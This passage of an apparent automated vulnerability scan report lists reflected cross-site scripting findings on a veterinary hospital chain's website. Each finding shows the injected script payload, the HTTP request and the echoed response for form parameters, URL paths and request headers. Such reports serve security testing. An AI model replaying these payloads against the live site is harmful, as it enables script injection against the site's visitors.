Set-Cookie: PHPSESSID=2fopkg0805iekeqe17d0m8pkk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
tphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=32c7e"><script>alert(1)</script>90a0eb32c87&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospita
...[SNIP]...

2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60be4"><script>alert(1)</script>496b4f91b44 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=kj92hmpgpn5u0e6c6lisgdjpj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
mpm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.
...[SNIP]...

2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321c7"><script>alert(1)</script>32eff3265ff was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mc85tfs8n4tb3ncs6vao1tc4e7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26am
...[SNIP]...

2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287cc"><script>alert(1)</script>5f92cd18c67 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3dmerjf0pu4ur5m108fr6u0eo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
e2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_t
...[SNIP]...

2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the time1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c314"><script>alert(1)</script>8b54768be74 was submitted in the time1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=va0mcsa20967inl4q6o12l7ce1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="time1" id="time1" type="text" size="15" maxlength="50" value="1c314"><script>alert(1)</script>8b54768be74" />
...[SNIP]...

2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the time2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36704"><script>alert(1)</script>8897a2f5b0 was submitted in the time2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3pljhhs657854au6aumnm7vhq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="time2" id="time2" type="text" size="15" maxlength="50" value="36704"><script>alert(1)</script>8897a2f5b0" />
...[SNIP]...

2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the time3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc15"><script>alert(1)</script>a12a15661f1 was submitted in the time3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9nroe6rd3or4ki6oso4miqpib1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="time3" id="time3" type="text" size="15" maxlength="50" value="fbc15"><script>alert(1)</script>a12a15661f1" />
...[SNIP]...

2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c98f"><script>alert(1)</script>1c63589670 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r71o8vgd1ptoa4ae288u3u1u00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%
...[SNIP]...

2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c08"><script>alert(1)</script>fa2f4234571 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=42ioijmo61q4lhnolf0g547n70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)64c08"><script>alert(1)</script>fa2f4234571&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)" />
...[SNIP]...

2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9a7"><script>alert(1)</script>a58880500cd was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:33 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=njd61do981s3a37nqrprgfios7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)fc9a7"><script>alert(1)</script>a58880500cd" />
...[SNIP]...

2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd10"><a>af94765ca4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/appt.htmlfbd10"><a>af94765ca4d HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="apptfbd10"><a>af94765ca4d">
...[SNIP]...

2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/plymouth/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b638a"><script>alert(1)</script>3e858d70063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.11.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 22006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/plymouth/appt.html?b638a"><script>alert(1)</script>3e858d70063=1" />
...[SNIP]...

2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.vcahospitals.com
Path:	/plymouth/more/boarding.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><a>2035dd31204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plymouth/more657cd"><a>2035dd31204/boarding.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/plymouth/appt.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.22.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<body id="more657cd"><a>2035dd31204">
...[SNIP]...

2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a275f"><script>alert(1)</script>50189f95eed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:32 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="http://www.google.com/search?hl=en&q=a275f"><script>alert(1)</script>50189f95eed" />
...[SNIP]...

2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/appt.html

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aeba"><script>alert(1)</script>f4116ac98b0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:28 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.131aeba"><script>alert(1)</script>f4116ac98b0" />
...[SNIP]...

2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57e77"><script>alert(1)</script>8105a26b689 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=57e77"><script>alert(1)</script>8105a26b689

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:05:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=qur1s877iqte90hbj289vogdv5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
